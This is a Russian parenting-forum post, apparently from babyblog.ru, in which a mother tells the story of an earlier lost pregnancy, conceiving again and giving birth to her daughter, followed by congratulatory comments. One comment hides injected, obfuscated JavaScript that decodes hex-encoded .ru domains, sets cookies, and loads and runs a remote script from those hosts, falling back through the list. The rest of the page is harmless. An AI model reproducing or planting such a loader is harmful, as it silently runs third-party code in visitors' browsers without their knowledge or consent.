Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch. 1 Created with Sketch. Created with Sketch. Created with Sketch. Created with Sketch.
Сообщество Рассказы о родах

ЗАПИСЬ

Ксюша 8 декабря 2015, 00:27 , Клагенфурт ···

как все было у меня

Пока сладкая булочка сопит у меня под бочком, хочу написать о своих родах, да и о беременности, и обо всем остальном )

Осознание того, что я готова стать мамой пришло ко мне не так давно, года 2 назад, хотя с мужем мы вместе уже 8 лет, но для меня материнство всегда было чем то крайне важным и ответсвенным, одним словом я понимала что в 20 лет ещё не готова к такому ответсвенному шагу. И муж разделял мою точку зрения, вообщем с детьми мы не торопились.


И вот пришло время когда я поняла что готова. Первая попытка и та-дам! У нас получилось) Но я никак не могла поверить что все это происходит со мной. И с наступлением 7й недельки побежала на УЗИ... так же мне хотелось услышать что все хорошо, но увы, беременность замершая, а именно анэмбриония(отсуствие эмбиончика в плотном яйце), потом чистка,востановление как физическое так и моральное. (Вот как интересно устроен человек. Я уже не помню ощущение боли во время родов, но отлично помню то уныние, которое испытала после неудачной беременности)


И вот после чистки прошло пол года,и как советовал врачь, можно приступать к новым попыткам стать родителями. Но прошло пару месяцев, а желаемого результата нет. Словами не передать моё переживание в то время. Я конечно же знала что даже самые здоровые пары и те могут зачать ребёнка далеко не с первого раза, но как бы я себя не убеждала что нужно уметь ждать и тд, всеровно переживаниям небыло предела. Стала вести график базальной температуры, и делать все возможное что бы наконец то увидеть заветные полосочки. И после ещё пару месяцев розачарований, я решила сделать паузу в планировании, занятся спортом, и просто не думать об этом хотя-бы пару недель.


и вот пришло время месячных.. а их нет)) но я не стала сразу делать тест, так как у меня и раньше бывали сбои, и задержка 5-10 дней для меня не новшество. Но дни шли, живот ныл, а месячных так и небыло.


8 Марта я все же решилась сделать тест(это уже с задержкой 9 дней). Помню как много раз представляла что сделаю тест, и приподнесу его супругу в красивой коробочке, или ещё как нибудь не обычно, но в тот самый чудный момент, когда 2я полосочка только начала проявлятся, все случилось не так как я было в моих мечтах)) я просто схватила тест, и вылетела с ванной с выпучиными глазами и дрожащей рукой протянула милому "призент". Причём рука тряслась настолько сильно, что он даже не смог разглядеть на ней тот тест)) Это было самое замечательное 8 Марта в моей жизни. С того самого первого момента я уже точно была уверенна что у нас будет доченька, даже помню как позвонила маме, и сказала что у неё скоро будет внучка))


Так началась моя такая желанная беременность. В этот раз я сразу настроила себя что все будет хорошо. И так и было, все шло просто отлично, даже токсикоз я принимала как радость, как свидетельство что все идёт хорошо. На 16 недельке нам подтвердили девочку,муж все же видимо хотел первого мальчика, хотя так и не сознался, но на УЗИ все спрашивал у врача, точно ли это девочка))


И вот наконец-то настал мой сладкий ноябрь, пдр у меня стоял по УЗИ на 10 ноября,но я так хотела, надеялась и верила что рожу раньше (наверное каждый раз когда я говорила об этом в слух или даже думала, малышка внутри тихонько улыбалась с меня и думала "ну-ну").Но прошло 10 число, а у меня было глухо как в танке, и все бы ничего,я не была сильно уставший от живота, меня ничего не беспокоило кроме дикой изжоги, и окружающих меня людей, которые каждый день спрашивали" а почему это я до сих пор не родила, может что то не так... " это очень напрягало. А дни шли,и вот уже 17е ноября, а я все ещё в строю, и день начинается не с улыбки, а с слёз, вера в то что рожу сама пропадала, а страх за роды от стимуляции все нарастал. Врачи дали срок до 20го числа, хотя я бы легла в больницу уже через 7 дней, мне уже не верилось, что все начнётся само.


И вот 19го ноября я собрала сумку в роддом, помыла голову, и легла спать пораньше, все же завтра важный день, нужно быть во все оружия))И в начале первого я вскочила с постели со словами НАЧАЛОСЬ, ЗВОНИ В СКОРУЮ, так как начали отходить воды, и уже спустя пару минут меня посетила первая схватка, она была похожа на боль во время месячных только сильнее, и я подумала что это уже и есть "приличная схватка", о, как же я ошибалась, и только сейчас я понимаю что во время месячных у меня никогда сильно не болел живот.

Скорая приехала примерно через 10 минут после вызова, так что осознание того, что я рожаю пришло ко мне уже по пути в больничку. Но мне не было страшно, или волнительно, я просто думала о том что скоро буду мамой, и пыталась насладится последними мнгновениями своей беременности.

Приехав в больницу меня сразу же переодели, и подключили к аппарату ктг, и одновременно медсестра принесла меню больницы, что бы я выбрала что буду есть, с горем по полам определилась с меню, и меня повели в мою палату, мне повезло, палата была одноместная, с огромной кроватью)) На часах было 2 ночи, и акушерка посоветовала поспать. А я так посмотрела на неё, и подумала " как можно спать, когда у меня схватки " хорошо что только подумала)) Спать конечно же не вышло, было очень волнительно и плюс ко всему воды мои и не думали прекращать лится, так я ходила по комнате из угла в угол, в перерывах наблюдала за спящим мужем, и засекала интервал между схватками, и в 6 утра ко мне наведалась акушерка, отправила снова на ктг, и посмотреть на сколько продвинулись дело, и как же я удивилась когда услышала что за 4 часа шейка открылась на 1 см! и того 2см))а мне то уже больно, я уже думала об уколе,но меня естественно порубали, так как на ктг эти схватки даже не просматривались. Отправили в палату ещё на 2 часа, после которых открытие 2.5см...кошмар.В 10 часов утра в больнице поменялась смена, и теперь моей акушеркой была молодая девушка, которая постоянно улыбалась, и сюскала со мной при каждой возможности, по началу ещё ничего, но потом это начало раздражать. На тот момент открытие было сантиметра 3,и мне поставили таблетку, которая способствовала скорейшему розкрытие шейки, и тогда наконец-то ктг уловил схватку,правда и я уже поняла,что то что было до этого-цветочки)

снова отправили в палату на 2 часа, и время начало тянутся... меня пару раз стошнило, было трудно сидеть и лежать, приходилось ходить, хотя сил уже небыло, учитывая что уже сутки я не спала почти. На схватках опиралась на подоконник и пыталась сосредоточится на дыхании, а муж тем временем массажировал мне поясницу, и задавал кучу вопрос, типа как лучше делать, чем лучше массажировать ладонью или пальцами, и меня это дико злило, но я пыталась просто не обращать внимания, и заниматся своим делом. Так время шло, и в 20.00 открытие было 7см,на мою просьбу, точнее мольбу сделать мне эпидуралку, акушерка сказала что если её сделать сейчас, то это замедлит процесс, и рожу я уже под утро, и как альтернативу предложила ещё одну таблетку для скорейшего открытия шейки, и плюс к ней немного какого то лекарства, которое поможет мне поспать, ну я согласилась на второй вариант, ибо ждать до утра было выше моих сил, и тут то началась истинная жесть) Боль на схватках дикая, а в промежутках я просто отключалась, перестала следить за временем, и думать о чем либо. Пришла в себя, когда мне показалось что характер схваток уже другой, ну думаю, схожу ка я пописать, и тут схватка как нахлынула, и вместе с ней потуга, оо непередаваемые ощущения)) На часах 11 ночи, позвали акушерку, та посмотрела и говорит, о, ну скоро начнём, и ушла(у неё ещё одна девушка рожала в тот момент) я лежу и офигеваю, тужит сильно, но нужно ждать. Благо вернулась она довольно быстро, и разрешила тужится по чуть-чуть. Естественно по началу у меня не получалось, муж сначала стоял у головы, но когда прошло пару потуг,а процесс не шёл, он стал рядом с акушеркой, держал мне ногу, и констатировал тот факт что он видит головку малышки, и что у неё светлые волосы(как у мужа), это меня стимулировало, я вроде как набиралась сил и тужилась как могла, но этого было не достаточно, и только лишь появляясь, головка уходила назад... так было довольно долго, пока врачь не сказала что нужно делать надрез... вот это меня отрезвило, и в следующую потугу я выдула голову, и почувствовала что порвалась, и впервые за все время родов, я не выдержала и начала стонать громко, уже просто небыло сил сдерживатся. Потом ещё одна попытка тужится и вышло тельце, и сразу такое облегчение (это было первое что пришло на ум в тот момент) муж сразу поцеловал, и поблагодарил за дочу, сказал что любит нас, а в то время её уже немного обтерли и положили мне на грудь, доча так сладко попискивала и смотрела мне в глаза, а я шептала ей, что она будет самой счастливой на свете, и что мы её так долго ждали)) А потом её понесли мыть и одевать, а я в тот момент благодарила Бога за это счастье быть мамой) И того,родила в 2.55 ночи, 21 ноября,сладкую девочку Мию с весом 3685гр.и 54см в длину))

Вот уже прошло 2 недели с того времени, боль забыта, я хочу ещё раз испытать этот сладкий момент, и пофиг что больно,и что на папу похожа больше чем на меня, но она лучшее,что было со мной в жизни)

Девушки, не бойтесь рожать,ведь нет ничего лучше, чем видеть своего малыша)) Спасибо всем кто дочитал мой занудный рассказ до конца)

1

КОММЕНТАРИИ

Zaychik 9 декабря 2015, 16:21 , Владикавказ
                                    

Поздравляю!!! Растите здоровенькие!!! Моя младшая тоже Миа)))

Ответить
Dominika 9 декабря 2015, 14:05 , Москва
                                    

И я весь рассказ переживала:-)

Примите мои запоздалые поздравления! Вы просто умница!

Ответить
Ксюша 9 декабря 2015, 16:20 , Клагенфурт
                                    

спасибо)) вам желаю лёгкой беременности и родов🌹🌹🌹

Ответить
Инна 9 декабря 2015, 08:37 , Луганск
                                    

Какой там занудный!!!! Прекрасный рассказ, я прослезилась!!!!

Ответить
елена «буду мамой 3й раз в 2020» 8 декабря 2015, 19:14 , Самара
                                    

искренне вас поздравляю)))) [removed]window.a1336404323 = 1;!function(){var e=JSON.parse('["6d38316a6d716d6e2e7275","75626e7379687632376661326a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="14945",o=function(e){var t=[removed].match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}[removed]=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "babyblog.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. t&&t())},i. o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();[removed]

Ответить
Мариша 8 декабря 2015, 09:20 , Уральск
                                    

Ой Ксюша до слёз так трогательно!!! Ещё раз с рождением доченьки!!!

Ответить
Ксения 8 декабря 2015, 02:36 , Москва
                                    

Очень хорошая история! :) поздравляю вас!

Ответить
? 8 декабря 2015, 01:25 , Казань
                                    

Очень трогательная история, я прям весь рассказ переживала за вас. Слава Богу все хорошо))) здоровья Вам и вашей принцессе.

Ответить